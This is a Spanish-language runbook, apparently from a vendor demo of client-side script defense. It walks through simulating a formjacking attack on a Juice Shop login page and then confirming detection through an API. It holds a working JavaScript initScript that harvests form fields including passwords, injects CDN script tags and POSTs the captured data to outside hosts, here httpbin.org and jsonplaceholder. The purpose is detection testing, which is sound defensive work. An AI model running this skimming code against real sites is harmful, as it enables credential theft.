Fase 2 — Ataque

La Fase 2 genera tráfico de ataque simulado contra la aplicación protegida y confirma que CSD lo detectó. La Fase 1 debe estar completa — todas las verificaciones del Paso 7 deben mostrar PASS — antes de continuar.

Paso 8: Simulación de Ataque

Nota

Este paso requiere la ejecución de JavaScript en el navegador — curl no puede activar la detección de CSD. Los asistentes de IA con herramientas de automatización de navegador (MCP Chrome DevTools, Playwright, Puppeteer) ejecutan estos pasos directamente utilizando la secuencia de Ejecución Automatizada por IA que se indica a continuación. Los operadores sin automatización de navegador realizan los pasos manuales.

Una vez verificada la infraestructura (todas las verificaciones del Paso 7 de la Fase 1 muestran PASS), ejecute los scripts de simulación de ataque para generar detecciones de CSD. Los scripts están definidos en la guía de Detección de activación y en la Biblioteca de scripts de ataque.

Ejecución Automatizada por IA

Los asistentes de IA con herramientas de automatización de navegador ejecutan la simulación de ataque de forma programática:

1. Navegar con initScript — primero navegue a about:blank para garantizar un contexto de documento limpio (evita initScripts obsoletos de navegaciones anteriores), luego navigate_page a http://$F5XC_DOMAINNAME/#/login con un initScript que guarde los referencias nativas de setInterval, clearInterval, fetch y console.log antes de que zone.js las modifique, sondee los campos del formulario de inicio de sesión, rellene las credenciales mediante el setter nativo de HTMLInputElement.prototype.value, y ejecute inmediatamente el Script de Detección Combinado en línea. Utilice el initScript textual que se indica a continuación.
2. Cerrar el Banner de Bienvenida — press_key con Escape para cerrar el Banner de Bienvenida. En visitas posteriores, el banner puede no aparecer (cookies persistidas). El diálogo de consentimiento de cookies se cierra automáticamente con la tecla Escape.
3. Esperar la finalización — espere 10 segundos para que se completen todas las devoluciones de llamada de carga/error de scripts CDN y las resoluciones de promesas fetch.
4. Capturar evidencia — list_console_messages para verificar [CSD Demo] Simulation complete y los resultados de carga de CDN; list_network_requests filtrado por tipos script y fetch para verificar los códigos de estado HTTP (200/201 para éxito, pending para solicitudes retenidas).

initScript de la Fase 2 (textual — usar exactamente como está escrito):

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

Precaución

Incompatibilidad con zone.js — Juice Shop utiliza zone.js de Angular, que parchea setTimeout, setInterval, fetch, XMLHttpRequest y otras APIs del navegador. Esto provoca errores en las herramientas evaluate_script, fill y click de MCP con Cannot read properties of undefined (reading 'call'). Use navigate_page con initScript en su lugar — initScript se ejecuta antes de que zone.js cargue, por lo que puede guardar referencias nativas de API y usarlas en las devoluciones de llamada de sondeo. El initScript debe rellenar los campos del formulario usando el setter nativo de HTMLInputElement.prototype.value (no fill) y ejecutar el script de detección en línea (no mediante setTimeout, que zone.js puede interceptar después de cargar la página). Consulte Detección de activación — Ejecución Automatizada por IA para más detalles.

Nota

Acumulación de initScript — cada llamada a navigate_page con un parámetro initScript agrega el script a una lista persistente que se ejecuta en cada carga de documento posterior. Para evitar que scripts obsoletos interfieran, navegue a about:blank entre ejecuciones o use new_page con isolatedContext para obtener un contexto de navegador limpio.

Nota

Guardar fetch nativo en el initScript — el initScript guarda window.fetch.bind(window) antes de que zone.js lo parchee. Esto garantiza que las llamadas fetch funcionen correctamente sin errores Cannot read properties of undefined de zone.js. El mismo initScript (con fetch nativo guardado) se usa tanto para las ejecuciones de ataque de la Fase 2 como de la Fase 3 — la mitigación de CSD no intercepta las llamadas fetch(), por lo que guardar la referencia nativa no afecta el comportamiento de mitigación.

Precaución

Error 404 transitorio en el origen — en la primera navegación a la aplicación Angular, polyfills.js u otros scripts de la aplicación pueden devolver un HTTP 404 transitorio desde el servidor de origen. Esto hace que Angular falle en el arranque, lo que resulta en una página en blanco sin formulario de inicio de sesión. El 404 es efímero — las solicitudes posteriores devuelven 200 o 304. Recuperación: navegue a about:blank, espere 2 segundos y reintente la navegación. Si el problema persiste en múltiples reintentos, verifique el estado del origen a través de la ruta del balanceador de carga (curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js).

Ejecución Manual

Los operadores sin herramientas de automatización de navegador realizan los pasos manualmente:

1. Navegar a la página de inicio de sesión de la aplicación protegida: http://xF5XC_DOMAINNAMEx/#/login
2. Ingresar credenciales ficticias — escriba test@example.com en el campo Email y P@ssword123 en el campo Password (no envíe el formulario)
3. Abrir DevTools — presione F12 y cambie a la pestaña Console
4. Ejecutar el Script de Detección Combinado — pegue el script de Detección de activación — Ejecutar el Script de Simulación Combinado en la consola y presione Enter
5. Verificar la salida de la consola — confirme que la salida por fases [CSD Demo] muestre: recolección de campos del formulario, inyección de scripts desde 4 dominios CDN y exfiltración de datos a 2 endpoints

Qué se Activa

Señal	Comportamiento	Detección
Recolección de campos del formulario	Lee los valores de los campos de entrada de email y contraseña	Scripts que leen campos de formulario sensibles — marcados como Riesgo Alto
Inyección de scripts	Inyecta 4 etiquetas <script> desde cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io	Hasta 4 nuevos dominios de scripts de terceros detectados (la disponibilidad del CDN varía)
Exfiltración de datos	Envía datos recolectados mediante fetch a www.httpbin.org y jsonplaceholder.typicode.com	Llamadas de red a dominios externos

Nota

La disponibilidad del CDN varía. No todos los 4 scripts CDN se cargarán en cada ejecución — los límites de recursos del navegador, las condiciones de red o la limitación del CDN pueden hacer que algunos fallen con ERR_INSUFFICIENT_RESOURCES o tiempo de espera agotado. La simulación tiene éxito si cualquier script CDN carga. CSD detecta el intento de inyección independientemente de si el script carga correctamente — la creación de la etiqueta <script> en sí misma es la señal de detección.

En casos graves, ERR_INSUFFICIENT_RESOURCES puede escalar a un fallo a nivel de página — la página completa queda en blanco, las capturas de pantalla expiran y take_snapshot falla. Esto ocurre típicamente después de que múltiples navegaciones con initScripts pesados se acumulan en el mismo contexto del navegador. Recuperación: use new_page con isolatedContext para crear un contexto de navegador nuevo y luego reintente desde la secuencia about:blank → navigate_page con initScript. Esto es distinto de los fallos de scripts CDN individuales, que no afectan el éxito de la simulación.

Consejo

Después de ejecutar la simulación de ataque, utilice este bucle de sondeo determinista para esperar las detecciones:

1. Consulte /detected_domains cada 60 segundos
2. Si DET-3 pasa (los dominios de exfiltración aparecen en /detected_domains), continúe al Paso 9 inmediatamente
3. Si sigue vacío después de 10 consultas (10 minutos), verifique el estado de CSD (Paso 5 de la Fase 1) y el registro del dominio protegido (Paso 6 de la Fase 1) — es probable que uno de estos esté mal configurado
4. Si sigue vacío después de 30 consultas (30 minutos), detenga el proceso e informe al operador — no continúe a la Fase 3

Para simulaciones adicionales dirigidas (categorías de ataque individuales, prueba de estrés de detección máxima), consulte la Biblioteca de scripts de ataque.

Evidencia

El asistente de IA debe reportar lo siguiente. Para la ejecución automatizada por IA, la evidencia se captura de forma programática mediante list_console_messages (la función de sondeo del initScript registra los resultados en la consola). Para la ejecución manual, el operador lee la salida de la consola del navegador.

Verificación	Esperado	Estado
Página de inicio de sesión cargada	200 OK en http://$F5XC_DOMAINNAME/#/login	PASS / FAIL
Script de consola ejecutado	[CSD Demo] Simulation complete en la salida de la consola	PASS / FAIL
Campos recolectados	Cantidad > 0 en la salida de la consola	PASS
Scripts inyectados	1–4 dominios CDN en la salida de la consola (algunos pueden fallar con errores de recursos)	PASS si aparece algún dominio CDN
Canales de exfiltración	2 intentos de fetch POST en la salida de la consola	PASS

Consejo

Si el certificado del LB HTTPS es válido (CertificateValid), opcionalmente puede ejecutar la simulación contra https://$F5XC_DOMAINNAME/#/login también. Esto no es obligatorio para la progresión de la demostración.

Paso 9: Verificación de Detección mediante API

Consulte los endpoints de la API de CSD para confirmar que aparecieron las detecciones. Use el bucle de sondeo: consulte /detected_domains cada 60 segundos; continúe tan pronto como DET-3 pase. Si DET-3 no pasa después de 10 minutos, verifique la configuración de CSD. Si DET-3 no pasa después de 30 minutos, detenga el proceso e informe al operador. Estos endpoints están documentados en la Referencia de API y usan la misma autenticación y espacio de nombres que los pasos anteriores.

Nota

Orden de procesamiento de endpoints: /detected_domains se rellena primero y es el indicador principal de que el pipeline de CSD está funcionando. /scripts y /formFields se rellenan en un cronograma de procesamiento de backend más lento y pueden permanecer vacíos durante 20–30 minutos incluso después de múltiples ejecuciones de simulación. Si /detected_domains muestra dominios de exfiltración (www.httpbin.org, jsonplaceholder.typicode.com), considere la simulación como detectada correctamente y continúe — la verificación DET-1 a continuación refleja esto.

Scripts Detectados

Consulte los scripts detectados en las últimas 24 horas:

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

Campo	Esperado	Estado
total	> 0 (scripts detectados)	PASS si > 0; PENDING si es 0 pero /detected_domains muestra dominios de exfiltración
Nombres de scripts	Incluye dominios CDN (cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io) en script_name	PASS si aparecen los dominios CDN inyectados

Dominios Detectados

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

Campo	Esperado	Estado
total_domains	> 0	PASS si > 0
Lista de dominios	Incluye dominios CDN y de exfiltración	PASS si aparecen los dominios esperados

Campos de Formulario

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

Campo	Esperado	Estado
total	> 0	PASS si > 0; PENDING si es 0 pero DET-3 pasa
name	Incluye email, password	PASS si aparecen los campos sensibles
sensitivity	Sensitive para los campos de email/contraseña	PASS si el ML clasificó correctamente

Nota

El procesamiento de campos de formulario es más lento que la detección de dominios. El endpoint /formFields puede devolver campos con metadatos parciales en la primera consulta. La clasificación de sensibilidad por ML (Sensitive vs Not Sensitive) se rellena después de que se complete el procesamiento del backend — esto puede tardar 20–30 minutos después de la primera ejecución de simulación. Si aparecen campos pero sin clasificación, vuelva a consultar más tarde. DET-3 (/detected_domains) es el criterio principal de aprobación.

Resumen de Evidencia de la Fase 2

Después de todas las consultas de detección, presente el estado final de detección:

ID de Prueba	Verificación	Estado
DET-1	Scripts detectados (endpoint /scripts)	PASS si > 0; PENDING si está vacío pero DET-3 pasa
DET-2	Dominios CDN detectados	PASS / FAIL
DET-3	Dominios de exfiltración detectados (/detected_domains)	Indicador principal — PASS si aparecen www.httpbin.org o jsonplaceholder.typicode.com
DET-4	Campos de formulario detectados (endpoint /formFields)	PASS si > 0; PENDING si está vacío pero DET-3 pasa

Nota

Criterio mínimo de aprobación para continuar a la Fase 3: DET-3 debe pasar (dominios de exfiltración visibles en /detected_domains). DET-1 y DET-4 pueden mostrar PENDING en el primer uso o después de una reconstrucción reciente — esto es normal. Si DET-3 también muestra FAIL después de 30 minutos, verifique que CSD esté habilitado (Paso 5 de la Fase 1), que el dominio protegido esté registrado (Paso 6 de la Fase 1) y que la etiqueta JS de CSD esté siendo inyectada (verificación de Configuración JS del Paso 7 de la Fase 1).

---

Fase 2 completa. Continúe a Fase 3 — Mitigar para aplicar reglas de mitigación y verificar que los dominios estén bloqueados.